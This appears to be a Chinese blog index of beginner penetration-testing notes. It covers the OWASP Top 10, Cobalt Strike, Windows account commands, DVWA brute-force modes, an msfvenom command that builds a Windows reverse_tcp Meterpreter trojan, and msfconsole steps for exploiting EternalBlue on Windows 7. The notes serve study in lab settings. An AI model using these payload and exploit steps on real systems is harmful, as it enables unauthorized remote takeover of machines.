1. 常见的网站漏洞
OWASP TOP 10:每年公布关于web安全的十大安全威胁报告,三年公开一次
- SQL注入(key):渗透数据库,获取数据库数据或者控制权限
- XSS
- 文件上传(key):上传木马病毒到网站中
- 反序列化
- 文件包含
- CSRF
- 命令执行(key):获取命令执行的权限
- 信息泄露
- XXE
- SSRF
- 未授权访问
木马钓鱼
Posted on
In
木马钓鱼
1. Cobalt Strike的安装和使用
Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS。其拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。服务端是一个,客户端可以有多个,团队可进行分布式协团操作。,使用之前要自己先配置好java的环境。
sql注入漏洞
Posted on
In
sql注入
msfconsole针对windows生成exe木马
Posted on
In
msfconsole
msfvenom -p(payload,负载选项) windows/x64/merterpreter/reverse_tcp lhost = 本机IP lport = 本机端口(随便)-f(生成什么形式的文件) exe -o(输出) demo.exe
msfconsole使用永恒之蓝获取win7命令行
Posted on
In
msfconsole
打开kali进root权限
命令行msfconsole(msf工具的一个接口)
search ms17_010(找永恒之蓝漏洞)
ues: use 0
set: 设置相关参数,源Ip(默认配好的),目标靶机ip、端口号(默认就行)
run
完成
LANMP靶场搭建
Posted on
In
LANMP靶场搭建
账户安全
Posted on
In
账户安全
1. 账户安全
1. 系统命令排查用户情况
- query user:查看当前登录账户
- logoff ID:注销用户ID
- net user:查看用户
- net user username:查看某个用户的登录情况
- Iusrmgr.msc:打开本地的用户组
一般用于服务器端,本机客户端有些命令不存在
php学习记录
Posted on
In
php
DVWA靶场练习
Posted on
In
DVWA靶场练习
1. 爆破
1. 四种爆破模式
单字典(只有一个字典)
1.Sniper:按顺序一个一个参数依次遍历,一个参数遍历完,然后恢复成原数据,再遍历下一个参数。
2.Battering ram:每个参数同时遍历同一个字典。但是这种爆破在实际过程中是很不合理的,应为基本不会有人将用户名和密码设置成一样的,就像大多数人不会将qq密码设置成qq号一样。
一个相当于单挑,一个相当于群殴。